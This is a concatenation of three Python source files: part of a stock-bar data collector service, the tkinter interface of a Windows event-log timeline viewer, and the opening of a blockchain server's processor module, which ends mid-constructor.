def callback(self, a, b, c, data):
"""
        Callback that handles subscription messages.
:param a:
:param b:
:param c:
:param data:
:return:
"""
data = json.loads(data)
if data['topic'].lower() == 'subscribe':
logger.info('stock bar collector service receive new subscribe: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.subscribe_callback(item)
else:
self.subscribe_callback(new_ins)
elif data['topic'].lower() == 'unsubscribe':
logger.info('stock bar collector service receive new unsubscribe: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.unsubscribe_callback(item)
else:
self.unsubscribe_callback(new_ins)
def get_data(self, frequency="1min", lens=5):
"""
        Fetch data from TDX.
:param frequency:
        :param lens: number of bars to fetch; by default the current and previous bar
:return:
"""
cur_time = datetime.datetime.now()
data = self.get_security_bar_concurrent(self.code_list, frequency, lens)
dfs = []
logger.info(data)
if len(data) > 0:
self.last_update_time = datetime.datetime.now()
for i in range(len(data)):
df = DataFrame(data[i])
df['code'] = self.code_list[i]
dfs.append(df)
end_time = datetime.datetime.now()
cost_time = (end_time - cur_time).total_seconds()
logger.info("request请求数据完成,耗时, cost: %s 秒" % cost_time)
return concat(dfs, sort=False).drop_duplicates()
def get_history_data(self, code_list, frequency="1min", n=1):
"""
        Fetch historical data.
        :param code_list:
        :param frequency: k-line (bar) granularity
        :param n: number of trading days before today; n = QA_util_get_trade_gap(start_date, today_)
:return:
"""
        # TODO: the history-data part belongs in strategy computation, not in
        #       data collection
        # TODO: get history bar data
        # TODO: call QA_fetch_stock_min_adv(code, start, end) to fetch data
        #       from the database
today = datetime.datetime(self.cur_year, self.cur_month, self.cur_day).isoformat()[:10]
start_date = QA_util_get_pre_trade_date(cursor_date=today, n=n)[:10]
end_date = QA_util_get_pre_trade_date(cursor_date=today, n=1)[:10]
# start='2019-05-08', end='2019-05-09' means start from 2019-05-08 9:30 and end to 2019-05-09 15:00
data = None
try:
data = QA_fetch_stock_min_adv(code_list, start=start_date, end=end_date)
except Exception as e:
logger.error("fetch stock min history data failure. " + e.__str__())
if data is not None:
for code in data.code.to_list():
qa_data = data.select_code(code)
if qa_data is not None:
                    # TODO: define a standard set of columns
self.publish_msg(qa_data.data.to_msgpack())
else:
lens = 0 # initial data len
if frequency in ['5', '5m', '5min', 'five']:
lens = 48 * n
elif frequency in ['1', '1m', '1min', 'one']:
lens = 240 * n
elif frequency in ['15', '15m', '15min', 'fifteen']:
lens = 16 * n
elif frequency in ['30', '30m', '30min', 'half']:
lens = 8 * n
elif frequency in ['60', '60m', '60min', '1h']:
lens = 4 * n
lens = 20800 if lens > 20800 else lens
            # TODO: if the database fetch fails, fetch online; see "save stock min"
            # data = self.get_security_bar_concurrent(code_list, frequency, lens)
            # TODO: define a standard set of columns
            # self.publish_msg(qa_data.data.to_msgpack())
pass
def update_date(self, date: datetime.datetime = None):
# TODO auto update every day
cur_time = datetime.datetime.now() if date is None else date
self.cur_year = cur_time.year
self.cur_month = cur_time.month
self.cur_day = cur_time.day
def length(self):
"""
        Return the size of the current subscription list.
:return:
"""
return len(self.code_list)
def update_data_job(self):
cur_time = datetime.datetime.now()
context = self.get_data()
if "code" not in context.columns or "datetime" not in context.columns:
logger.info("the requested data has no columns name like 'code'")
return
if context.shape[0] == 0:
logger.info("the requested data has no rows")
return
        # fix TDX stamping the 11:30 bar's time as 13:00
# if isinstance(context.code[0], str):
context.datetime = context.datetime.apply(lambda x: datetime.datetime.fromisoformat(
x.replace('13:00', '11:30')))
        # TODO: TDX realtime data can be abnormal: 1. timestamps outside
        #       trading hours 2. OHLC amplitude exceeding 10% of the previous
        #       trading day's close
        # Fixed: 1. timestamps outside trading hours
if "year" in context.columns:
context = context[
(context.year == self.cur_year) & (context.month == self.cur_month) & (
context.day <= self.cur_day)]
        # auto-pad codes with leading zeros to the full stock code
# context["code"] = context["code"].apply(fill_stock_code)
        # TODO: filter out rows with abnormal amplitude
context = context.merge(self.pre_market_data[['code', 'close']], on='code', suffixes=('', '_y'))
        # abnormal rows
_context = context[
(
(context.open / context.close_y - 1).abs() >= 0.101
) & (
(context.high / context.close_y - 1).abs() >= 0.101
) & (
(context.low / context.close_y - 1).abs() >= 0.101
) & (
(context.close / context.close_y - 1).abs() >= 0.101
)
]
if _context.shape[0] > 0:
logger.info("异常数据输出START")
logger.info(_context.to_csv())
logger.info("异常数据输出END")
# 过滤异常数据
context = context[
(
(context.open / context.close_y - 1).abs() < 0.101
) & (
(context.high / context.close_y - 1).abs() < 0.101
) & (
(context.low / context.close_y - 1).abs() < 0.101
) & (
(context.close / context.close_y - 1).abs() < 0.101
)
]
        # convert the datetime column from str to Timestamp('2019-10-24 13:00:00', freq='1T')
context["datetime"] = DatetimeIndex(context.datetime).to_list()
context = context.drop([
"year", "month", "day", "hour", "minute", "close_y"], axis=1
).reset_index(drop=True).set_index(["datetime", "code"]).sort_index()
# TODO context.groupby(code)
end_time = datetime.datetime.now()
self.last_update_time = end_time
cost_time = (end_time - cur_time).total_seconds()
logger.info("clean数据初步清洗, 耗时, cost: %s 秒" % cost_time)
# 数据原始记录输出到csv
logger.info(context.to_csv(float_format='%.3f'))
filename = get_file_name_by_date('stock.collector.%s.csv', self.log_dir)
logging_csv(context, filename, index=True)
        self.publish_msg(context.to_json())  # publish the bars as JSON
del context
def run(self):
        # periodically fetch data in a loop
count = 0
while 1:
# code list not empty
count += 1
logger.info("stock bar collector service requested data start. count %s" % count)
if self.length() <= 0:
logger.info("code list is empty")
time.sleep(1)
continue
self.isRequesting = True
            # fetch between 9:15-11:31 and 12:58-15:00
cur_time = datetime.datetime.now()
_pass = (cur_time - self.last_update_time).total_seconds()
            if self.debug or util_is_trade_time(cur_time):  # if within trading hours
if _pass > 55:
logger.warning("超时未收到更新数据")
self.update_data_job()
else:
logger.info('current time %s not in trade time' % cur_time.isoformat())
logger.info("stock bar collector service requested data end. count %s" % count)
self.isRequesting = False
time.sleep(self.delay)
@click.command()
# @click.argument()
@click.option('-t', '--delay', default=20.5, help="fetch data interval, float", type=click.FLOAT)
@click.option('-log', '--logfile', help="log file path", type=click.Path(exists=False))
@click.option('-log_dir', '--log_dir', help="log path", type=click.Path(exists=False))
def main(delay: float = 20.5, logfile: str = None, log_dir: str = None):
    try:
        import logging.config
        from QARealtimeCollector.utils.logconf import update_log_file_config
        logfile = 'stock.collector.log' if logfile is None else logfile
        logging.config.dictConfig(update_log_file_config(logfile))
except Exception as e:
print(e.__str__())
    log_dir = (log_dir or './log').replace('~', os.path.expanduser('~'))
    QARTCStockBar(delay=delay, log_dir=log_dir, debug=False).start()
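# Example invocation (paths are illustrative):
#   python stockbarcollector.py -t 20.5 -log stock.collector.log -log_dir ~/log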
if __name__ == "__main__":
# normal
main()
|
ui.py
|
from sqlite3 import IntegrityError
from tkinter import *
from tkinter import messagebox, filedialog
from tkinter import font
from tkinter.ttk import *
from threading import Thread
from winlogtimeline import util, collector
from winlogtimeline.util.logs import Record
from .new_project import NewProject
from .tag_settings import TagSettings
from .collection_settings import CollectionSettings
from .import_window import ImportWindow
from .help_window import HelpWindow
from .export_timeline import ExportWindow
from .filter_window import FilterWindow
from .expanded_view import ExpandedView
from .startup_window import StartupWindow
import os
import platform
def enable_disable_wrapper(_lambda):
def decorate(f):
def call(*args, **kwargs):
if not _lambda(*args).enabled:
_lambda(*args).update_status_bar('Notice: The selected action is disabled until a project is opened.')
return None
else:
return f(*args, **kwargs)
return call
return decorate
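# Usage note: methods decorated with @enable_disable_wrapper(lambda *args: args[0])
# become no-ops (beyond a status-bar notice) while self.enabled is False,
# i.e. until a project has been opened.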
class GUI(Tk):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.winfo_toplevel().title('PyEventLogViewer')
self.minsize(width=800, height=600)
self.program_config = util.data.open_config()
self.current_project = None
self.menu_bar = MenuBar(self, tearoff=False)
self.status_bar = StatusBar(self)
self.toolbar = Toolbar(self)
self.filter_section = Filters(self)
self.expanded_view = None # SideBar(self)
self.timeline = None
self.enabled = True
self.system = platform.system()
self.changes_made = False
self.create_startup_window()
self.__disable__()
self.protocol('WM_DELETE_WINDOW', self.__destroy__)
def update_status_bar(self, text):
"""
Updates the status bar.
:param text: The message to place in the status bar.
:return:
"""
self.status_bar.update_status(text)
def get_progress_bar_context_manager(self, max_value):
"""
Returns a context manager which can be used to create and update the progress bar.
:param max_value: The maximum value for the progress bar.
:return:
"""
return StatusBarContextManager(self.status_bar, max_value)
def create_project(self):
window = NewProject(self)
window.grab_set()
def open_collection_settings(self):
window = CollectionSettings(self)
window.grab_set()
def open_color_settings(self):
window = TagSettings(self)
window.grab_set()
def open_project(self, project_path):
"""
Opens a project. This will create it if it doesn't already exist.
:param project_path: The path to the project elv file.
:return:
"""
self.current_project = util.project.Project(project_path)
# Check that the project was able to be created
if self.current_project.exception is not None:
self.current_project = None
return
self.winfo_toplevel().title(f'PyEventLogViewer - {self.current_project.get_path().split(os.path.sep)[-1]}')
# Update the UI selected timezone to match the one in the project config
self.menu_bar.timezone_offset.set(self.current_project.config['state']['timezone_offset'])
self.create_new_timeline()
self.__enable__()
def close_project(self):
"""
Prompts the user to save the project and then closes it.
:return:
"""
if self.current_project is not None and self.changes_made:
answer = messagebox.askquestion(title='Save Before Close',
message='Would you like to save the currently opened project before '
'closing it?', type=messagebox.YESNOCANCEL)
if answer == messagebox.YES:
self.changes_made = False
self.current_project.close()
elif answer == messagebox.NO:
pass
else:
return
self.current_project = None
self.winfo_toplevel().title('PyEventLogViewer')
if self.timeline is not None:
self.timeline.pack_forget()
self.timeline = None
@enable_disable_wrapper(lambda *args: args[0])
def import_function(self, file_name, alias):
"""
Function used to kick off the log import process.
:param file_name: The path to the file to import.
:param alias: A unique alias for the file.
:return:
"""
self.__disable__()
def callback():
nonlocal self, file_name, alias
# Prepare status bar callback.
text = '{file}: {status}'.format(file=os.path.basename(file_name), status='{status}')
# Start the import log process.
try:
collector.import_log(file_name, alias, self.current_project, '',
lambda s: self.update_status_bar(text.format(status=s)),
self.get_progress_bar_context_manager)
except IntegrityError:
self.update_status_bar(f'Error while importing log: {file_name} has already been imported')
self.current_project.cleanup_import(alias)
self.__enable__()
return
except Exception as e:
self.update_status_bar(f'Error while importing log: {e.__class__.__name__}: {str(e)}')
self.current_project.cleanup_import(alias)
self.__enable__()
return
# Create or update the timeline.
self.create_new_timeline()
self.changes_made = True
t = Thread(target=callback)
t.start()
return
def get_filtered_records(self):
"""
Returns a list of records with the filter applied. Meant for use in the export process.
:return:
"""
        return self.current_project.filter_logs(self.filter_section.dedup_var)  # use the dedup checkbox state from Filters
def create_new_timeline(self, headers=None, records=None):
"""
Function for creating/updating the event section.
:param headers: A tuple containing the column titles. These should be in the same order as the values in
records.
:param records: A list of tuples containing the record values.
:return:
"""
def callback():
nonlocal self, headers, records
# Disable all timeline interaction buttons to prevent a timeline duplication bug
self.__disable__()
self.update_status_bar('Loading records...')
# Get all records if they weren't provided
if records is None:
records = self.filter_section.apply_filter()
if len(records) == 0:
self.__enable__()
self.update_status_bar('No records to display. ')
return
if headers is None:
headers = Record.get_headers()
records = [record.get_tuple() for record in records]
# Delete the old timeline if it exists
if self.timeline is not None:
self.timeline.pack_forget()
self.update_status_bar('Rendering timeline...')
# Create the new timeline
self.timeline = Timeline(self, headers, records)
self.update_status_bar('')
# Enable all timeline interaction buttons
self.__enable__()
t = Thread(target=callback)
t.start()
def create_startup_window(self):
"""
Helper function that checks the config.json file and decides whether or not to display the startup window.
:return:
"""
startup_window = self.program_config.get("startup_window", None)
# Check to see if the config.json file has a startup_window key.
if startup_window is None:
# self.program_config.update({"startup_window": True})
self.program_config["startup_window"] = True
startup_window = True
util.data.write_config(self.program_config)
if startup_window:
window = StartupWindow(self)
window.attributes('-topmost', True)
def __disable__(self):
self.enabled = False
if self.system != 'Darwin':
self.toolbar.__disable__()
# self.query_bar.__disable__()
# self.filter_section.__disable__()
self.menu_bar.__disable__()
def __enable__(self):
self.enabled = True
if self.system != 'Darwin':
self.toolbar.__enable__()
# self.query_bar.__enable__()
# self.filter_section.__enable__()
self.menu_bar.__enable__()
def __destroy__(self):
self.close_project()
self.destroy()
class Timeline(Frame):
def __init__(self, parent, headers, data, **kwargs):
super().__init__(parent, **kwargs)
# Class variables
self.headers = headers
self.col_width = {header: font.Font().measure(header) for header in headers}
# Create and place the widgets
self._init_widgets()
self.setup_columns()
self.update_column_widths(data)
self.update_tags(parent.current_project.config['events']['colors'])
self.populate_timeline(data)
self.sort_column('Timestamp', False)
self._place_widgets()
def _init_widgets(self):
# Treeview
self.tree = Treeview(columns=self.headers, show='headings')
# Scrollbars
self.vsb = Scrollbar(orient='vertical', command=self.tree.yview)
self.hsb = Scrollbar(orient='horizontal', command=self.tree.xview)
self.tree.configure(yscrollcommand=self.vsb.set, xscrollcommand=self.hsb.set)
# Set all columns to be enabled by default
self.tree['displaycolumns'] = self.master.current_project.config['state']['columns']
# Add a context menu on right click for enabling and disabling columns
if self.master.system.lower() == "darwin":
self.tree.bind('<Button-2>', self.master.menu_bar.header_popup) # macOS or Unix
else:
self.tree.bind('<Button-3>', self.master.menu_bar.header_popup) # Windows
self.tree.bind("<Double-1>", self.double_click)
def _place_widgets(self):
# Tree
self.tree.grid(column=0, row=0, sticky='nsew', in_=self)
# Scrollbars
self.vsb.grid(column=1, row=0, sticky='ns', in_=self)
self.hsb.grid(column=0, row=1, sticky='ew', in_=self)
self.grid_columnconfigure(0, weight=1)
self.grid_rowconfigure(0, weight=1)
self.pack(fill=BOTH, expand=True)
def update_tags(self, tags):
"""
Updates the colors associated with record tags.
:param tags: The tags to update.
:return:
"""
for source, events in tags.items():
for event, color in events.items():
self.tree.tag_configure(f'{source}::{event}', background=color)
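    # Illustrative shape of the `tags` argument (values are hypothetical):
    # a mapping of source -> {event id -> background color}, e.g.
    #     {'Security': {'4624': '#90EE90', '4625': '#FFB6C1'}}
    # which configures the tree tags 'Security::4624' and 'Security::4625'.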
def setup_columns(self):
"""
Inserts headers into the timeline.
:return:
"""
# Set up the columns
for col in self.headers:
self.tree.heading(col, text=col.title(), command=lambda _col=col: self.sort_column(_col, False))
def populate_timeline(self, data):
"""
Populates the timeline.
:param data: The data to insert into the timeline.
:return:
"""
# Insert the data
self.master.update_status_bar('Populating timeline...')
with self.master.get_progress_bar_context_manager(len(data)) as progress_bar:
for i, row in enumerate(data):
self.tree.insert('', 'end', values=row, tags=f'{row[4]}::{row[1]}')
if not i % 100:
progress_bar.update_progress(100)
self.master.update_status_bar('Finished populating timeline.')
def update_column_widths(self, data):
"""
Calculates the widths for the columns.
:param data: The data to iterate over.
:return:
"""
known_s_widths = dict()
known_widths = dict()
excluded_headers = {'Details', }
measurement_font = font.Font()
# Determine the column widths
self.master.update_status_bar("Calculating the column widths...")
with self.master.get_progress_bar_context_manager(len(data)) as progress_bar:
for j, row in enumerate(data):
# Update the column widths
for i, v in enumerate(row):
if self.headers[i] in excluded_headers:
continue
if type(v) is str:
if len(v) not in known_s_widths:
known_s_widths[len(v)] = measurement_font.measure(v)
width = known_s_widths[len(v)]
else:
if v not in known_widths:
known_widths[v] = measurement_font.measure(v)
width = known_widths[v]
if width > self.col_width[self.headers[i]]:
self.col_width[self.headers[i]] = width
# Update the progress bar
if not j % 100:
progress_bar.update_progress(100)
self.master.update_status_bar('Finished calculating column widths.')
# Updating the column widths
for col in self.headers:
self.tree.column(col, width=self.col_width[col])
def sort_column(self, col, reverse):
"""
Sorts the timeline based on a particular column.
:param col: The column to sort.
:param reverse: Whether or not to sort in reverse order.
:return:
"""
column_elements = [(self.tree.set(k, col), k) for k in self.tree.get_children('')]
if col == 'Event ID' or col == 'Record Number':
column_elements = [(int(v), k) for v, k in column_elements]
column_elements.sort(reverse=reverse)
for index, (val, k) in enumerate(column_elements):
self.tree.move(k, '', index)
self.tree.heading(col, command=lambda _col=col: self.sort_column(_col, not reverse))
    def double_click(self, event):
        item = self.tree.selection()[0]
        values = self.tree.item(item, "values")
        # Query for all of the records that have the specific record hash
        query = "SELECT * FROM raw_xml_data WHERE record_hash = ?"
        cur = self.master.current_project._conn.execute(query, (values[-2],))
record = cur.fetchall()[0]
if self.master.expanded_view is None: # or self.master.side_bar == .!sidebar:
self.master.expanded_view = ExpandedView(self.master)
self.master.expanded_view.update_view(record[1])
class StatusBar(Frame):
def __init__(self, parent):
super().__init__(parent, relief=SUNKEN)
self.progress = None
self._init_widgets()
self._place_widgets()
def _init_widgets(self):
self.status = Label(self, text='Notice: Create a new project or open an existing project to get started.',
anchor=W)
def _place_widgets(self):
padding = 2
self.status.grid(row=0, column=0, padx=padding, pady=padding + 2, sticky='W')
# self.progress.grid(row=0, column=1, padx=padding, pady=padding, sticky='E')
self.columnconfigure(0, weight=4)
self.pack(side=BOTTOM, fill=X)
def update_status(self, message):
"""
Updates the message displayed on the status bar.
:param message: The message to display.
:return:
"""
self.status.config(text=message)
class StatusBarContextManager:
def __init__(self, parent, max_value):
self.parent = parent
self.max_value = max_value
def __enter__(self):
self.parent.progress = Progressbar(self.parent, length=200, maximum=self.max_value, mode='determinate')
self.parent.progress.grid(row=0, column=1, padx=2, pady=2, sticky='E')
return self
def __exit__(self, *args):
self.parent.progress.grid_forget()
def update_progress(self, steps):
"""
Increments the progress bar.
:param steps: The number of steps to increment the progress bar by.
:return:
"""
self.parent.progress.step(steps)
class Toolbar(Frame):
def __init__(self, parent, *args, **kwargs):
super().__init__(parent, borderwidth=1, relief=SUNKEN, **kwargs)
self.import_photo = PhotoImage(file=util.data.get_package_data_path(__file__, 'icons', 'import.gif'))
self.export_photo = PhotoImage(file=util.data.get_package_data_path(__file__, 'icons', 'export.gif'))
self.import_button = Button(self, image=self.import_photo, width='20',
command=self.master.menu_bar.import_button_function)
self.export_button = Button(self, image=self.export_photo, width='20',
command=self.master.menu_bar.export_button_function)
self.import_button.pack()
self.export_button.pack()
self.pack(side=LEFT, fill=Y)
def __disable__(self):
self.import_button.config(state=DISABLED)
self.export_button.config(state=DISABLED)
def __enable__(self):
self.import_button.config(state=NORMAL)
self.export_button.config(state=NORMAL)
class MenuBar(Menu):
def __init__(self, parent, **kwargs):
super().__init__(parent, **kwargs)
parent.config(menu=self)
# File
self.file_menu = Menu(self, **kwargs)
self.add_cascade(label='File', menu=self.file_menu, underline=0)
# File -> New Project (Ctrl+N)
self.file_menu.add_command(label='New', command=self.new_project_function, underline=0,
accelerator='Ctrl+N')
parent.bind('<Control-n>', self.new_project_function)
# File -> Open... (Ctrl+O)
self.file_menu.add_command(label='Open...', command=self.open_project_function, underline=0,
accelerator='Ctrl+O')
parent.bind('<Control-o>', self.open_project_function)
# File -> Save
self.file_menu.add_command(label='Save', command=self.save_project_function, underline=0,
accelerator='Ctrl+S')
parent.bind('<Control-s>', self.save_project_function)
# File -> Export
self.file_menu.add_command(label="Export Timeline", command=self.export_button_function, underline=0,
accelerator='Ctrl+E')
parent.bind('<Control-e>', self.export_button_function)
# View
self.view_menu = Menu(self, **kwargs)
self.add_cascade(label='View', menu=self.view_menu, underline=0)
# View -> Timeline Headers
self.timeline_header_menu = None
self.header_vars = dict()
self.header_pairs = list()
underlines = set()
# Individual headers and associated variables/callbacks
for h in Record.get_headers():
# Initialize the variable indicating whether or not the column is enabled
self.header_vars[h] = BooleanVar()
# Determine which character to underline for shortcuts
i = 0
while h[i] in underlines:
i += 1
underlines.add(h[i])
self.header_pairs.append((h, i))
# Default value and callback function
self.header_vars[h].set(True)
self.header_vars[h].trace('w', self.update_column_function)
self.build_timeline_header_menu(type="dropdown", **kwargs)
# View -> Timezone
self.timezone_menu = Menu(self, **kwargs)
self.view_menu.add_cascade(label='Timezone', menu=self.timezone_menu, underline=5)
self.timezone_offset = IntVar()
self.timezone_offset.set(0)
cities = ['United States Minor Outlying Islands',
'American Samoa',
'Honolulu',
'Anchorage',
'Los Angeles/Vancouver',
'Phoenix/Calgary',
'Chicago/Mexico City',
'New York/Havana',
'Caracas/Halifax',
'Buenos Aires/São Paulo',
'Brazil',
'Cape Verde',
'Dublin/London',
'Berlin/Paris/Rome',
'Bucharest/Jerusalem',
'Istanbul/Baghdad',
'Dubai',
'Karachi/Tashkent',
'Almaty/Dhaka',
'Jakarta/Bangkok',
'Beijing/Taipei',
'Seoul/Tokyo',
'Sydney',
'Noumea',
'Auckland',
'Apia',
'Kiribati']
for offset in range(-12, 13):
self.timezone_menu.add_radiobutton(label=f'UTC{offset:+d} - {cities[offset + 12]}',
# if offset != 0 else 'UTC',
variable=self.timezone_offset, value=offset,
command=self.update_timezone_offset)
# Tools
self.tool_menu = Menu(self, **kwargs)
self.add_cascade(label='Tools', menu=self.tool_menu, underline=0)
# Tools -> Record Highlighting
self.tool_menu.add_command(label='Record Highlighting', command=self.color_settings_function, underline=0)
# Tools -> Configure Log Collection
        self.tool_menu.add_command(label='Configure Log Collection', command=self.collection_settings_function,
                                   underline=1)
# Tools -> Import Log
self.tool_menu.add_command(label='Import Log File', command=self.import_button_function, underline=0,
accelerator='Ctrl+I')
parent.bind('<Control-i>', self.import_button_function)
# Help
self.help_menu = Menu(self, **kwargs)
self.add_cascade(label='Help', menu=self.help_menu, underline=0)
# Help -> About
self.help_menu.add_command(label='About', command=self.about_function, underline=0)
# Help -> License
self.help_menu.add_command(label='License', command=self.license_function, underline=0)
# Help -> Contact
self.help_menu.add_command(label='Contact', command=self.contact_function, underline=0)
def new_project_function(self, event=None):
"""
Callback function for File -> New. Closes the current project and kicks of the project creation wizard.
:param event: A click or key press event.
:return:
"""
self.master.close_project()
self.master.create_project()
if self.master.current_project is not None:
self.master.update_status_bar('Project created at ' + self.master.current_project.get_path())
else:
self.master.__disable__()
def open_project_function(self, event=None):
"""
Callback function for File -> Open. Closes the current project and kicks off the open project UI.
:param event: A click or key press event.
:return:
"""
projects_path = os.path.join(util.data.get_appdir(), 'Projects')
filename = filedialog.askopenfilename(initialdir=projects_path, title='Open a Project File',
filetypes=(('ELV Project File', '*.elv'),))
if len(filename) > 0:
self.master.close_project()
self.master.open_project(filename)
if self.master.current_project is not None:
self.master.update_status_bar('Project opened at ' + self.master.current_project.get_path())
else:
self.master.update_status_bar('Failed to open the project at ' + filename)
return
# Load the enabled and disabled columns
for col in self.header_vars.keys():
self.header_vars[col].set(col in self.master.current_project.config['state']['columns'])
self.master.changes_made = False
@enable_disable_wrapper(lambda *args: args[0].master)
def save_project_function(self, event=None):
"""
Callback function for File -> Save. Saves the current project.
:param event: A click or key press event.
:return:
"""
if self.master.current_project is None:
return
self.master.current_project.save()
self.master.update_status_bar('Project saved')
self.master.changes_made = False
@enable_disable_wrapper(lambda *args: args[0].master)
def color_settings_function(self, event=None):
"""
Callback function for Tools -> Record Highlighting. Alters the colors for the current project.
:param event: A click or key press event.
:return:
"""
self.master.open_color_settings()
@enable_disable_wrapper(lambda *args: args[0].master)
    def collection_settings_function(self, event=None):
"""
Callback function for Tools -> Configure Log Collection. Alters the records being scraped for the current project.
:param event: A click or key press event.
:return:
"""
self.master.open_collection_settings()
@enable_disable_wrapper(lambda *args: args[0].master)
def import_button_function(self, event=None):
"""
Callback function for Tools -> Import Log File. Launches the log file import window.
:return:
"""
wizard = ImportWindow(self)
wizard.grab_set()
@enable_disable_wrapper(lambda *args: args[0].master)
def export_button_function(self, event=None):
"""
Callback function for File -> Export Timeline. Launches the export window.
:return:
"""
wizard = ExportWindow(self, self.master.current_project)
wizard.grab_set()
@enable_disable_wrapper(lambda *args: args[0].master)
def filter_function(self, event=None):
"""
:param event:
:return:
"""
wizard = FilterWindow(self, self.master.current_project)
wizard.grab_set()
@enable_disable_wrapper(lambda *args: args[0].master)
def update_column_function(self, *args, event=None):
"""
Used to enable and disable timeline columns.
:return:
"""
columns = tuple(col for col in Record.get_headers() if self.header_vars[col].get())
if self.master.current_project is not None:
self.master.current_project.config['state']['columns'] = columns
self.master.changes_made = True
if self.master.timeline is None:
return
self.master.timeline.tree['displaycolumns'] = columns
@enable_disable_wrapper(lambda *args: args[0].master)
def update_timezone_offset(self, event=None):
"""
Changes the timezone offset and refreshes the timeline. Also marks the project as changed so that the user is
prompted to save before closing.
:return:
"""
if self.master.current_project is not None:
self.master.current_project.config['state']['timezone_offset'] = self.timezone_offset.get()
self.master.create_new_timeline()
self.master.changes_made = True
def enable_all_columns_function(self, event=None):
"""
Enables all columns.
:return:
"""
for h, v in self.header_vars.items():
if not v.get():
v.set(True)
def build_timeline_header_menu(self, type="dropdown", event=None, **kwargs):
self.timeline_header_menu = Menu(self, **kwargs)
if type == "dropdown":
self.view_menu.add_cascade(label='Timeline Headers', menu=self.timeline_header_menu, underline=0)
self.timeline_header_menu.add_command(label='Enable All', command=self.enable_all_columns_function, underline=8)
self.timeline_header_menu.add_separator()
# Individual headers and associated variables/callbacks
for pair in self.header_pairs:
# Add a checkbutton per pair
self.timeline_header_menu.add_checkbutton(label=pair[0], onvalue=True, offvalue=False,
variable=self.header_vars[pair[0]], underline=pair[1])
if type != "dropdown":
self.timeline_header_menu.tk_popup(event.x_root, event.y_root)
def header_popup(self, event=None):
"""
Event callback used when the user right clicks on the timeline. Should bring up the header enable/disable menu.
:return:
"""
try:
self.build_timeline_header_menu("popup", event)
finally:
self.timeline_header_menu.grab_release()
def about_function(self, event=None):
"""
:param event:
:return:
"""
wizard = HelpWindow(self, "about")
wizard.grab_set()
def license_function(self, event=None):
"""
:param event:
:return:
"""
wizard = HelpWindow(self, "license")
wizard.grab_set()
def contact_function(self, event=None):
"""
:param event:
:return:
"""
wizard = HelpWindow(self, "contact")
wizard.grab_set()
def __enable__(self):
self.entryconfig('Tools', state=NORMAL)
self.entryconfig('View', state=NORMAL)
self.file_menu.entryconfig('Save', state=NORMAL)
self.file_menu.entryconfig('Export Timeline', state=NORMAL)
def __disable__(self):
self.entryconfig('Tools', state=DISABLED)
self.entryconfig('View', state=DISABLED)
self.file_menu.entryconfig('Save', state=DISABLED)
self.file_menu.entryconfig('Export Timeline', state=DISABLED)
class Filters(Frame):
def __init__(self, parent, **kwargs):
super().__init__(parent, **kwargs)
self.pack(side=TOP, fill=X)
self.advanced = Button(self, text="Filters", command=lambda: self.advanced_filter_function())
self.advanced.pack(side=LEFT)
self.clear = Button(self, text="Clear", command=lambda: self.clear_timeline())
self.clear.pack(side=LEFT)
self.dedup_var = IntVar(value=0)
self.dedup = Checkbutton(self, text="Deduplicate", variable=self.dedup_var)
self.dedup.pack(side=LEFT)
# self.dedup_var.trace('w', self.apply_filter())
def create_column_list(self, colList):
tmp = Record.get_headers()
for col in tmp:
colList.append(col)
def apply_filter(self):
if 'filters' in self.master.current_project.config:
return self.master.current_project.filter_logs(self.dedup_var)
else:
return self.master.current_project.get_all_logs()
@enable_disable_wrapper(lambda *args: args[0].master)
def clear_timeline(self):
self.master.changes_made = True
self.master.current_project.config['filters'] = [f[:3] + [0] for f in
self.master.current_project.config.get('filters', [])]
self.master.create_new_timeline()
@enable_disable_wrapper(lambda *args: args[0].master)
def advanced_filter_function(self, event=None):
"""
:param event:
:return:
"""
wizard = FilterWindow(self, self.master.current_project)
wizard.grab_set()
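# A minimal launch sketch (an assumption, not part of the original module):
# guarded so importing this module stays side-effect free.
if __name__ == '__main__':
    gui = GUI()
    gui.mainloop()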
|
blockchain_processor.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from json import dumps, load
import os
from Queue import Queue
import random
import sys
import time
import threading
import urllib
import deserialize
from processor import Processor, print_log
from storage import Storage
from utils import logger, hash_decode, hash_encode, HashX11, Hash, header_from_string, header_to_string, ProfiledThread, \
rev_hex, int_to_hex4
class BlockchainProcessor(Processor):
def __init__(self, config, shared):
Processor.__init__(self)
# monitoring
self.avg_time = 0,0,0
self.time_ref = time.time()
self.shared = shared
self.config = config
self.up_to_date = False
self.watch_lock = threading.Lock()
self.watch_blocks = []
self.watch_headers = []
self.watched_addresses = {}
self.history_cache = {}
self.merkle_cache = {}
self.max_cache_size = 100000
self.chunk_cache = {}
self.cache_lock = threading.Lock()
self.headers_data = ''
self.headers_path = config.get('leveldb', 'path')
self.mempool_fees = {}
self.mempool_values = {}
self.mempool_addresses = {}
self.mempool_hist = {} # addr -> (txid, delta)
self.mempool_unconfirmed = {} # txid -> set of unconfirmed inputs
self.mempool_hashes = set()
self.mempool_lock = threading.Lock()
self.address_queue = Queue()
try:
self.test_reorgs = config.getboolean('leveldb', 'test_reorgs') # simulate random blockchain reorgs
except:
self.test_reorgs = False
self.storage = Storage(config, shared, self.test_reorgs)
self.mued_url = 'http://%s:%s@%s:%s/' % (
config.get('mued', 'mued_user'),
config.get('mued', 'mued_password'),
config.get('mued', 'mued_host'),
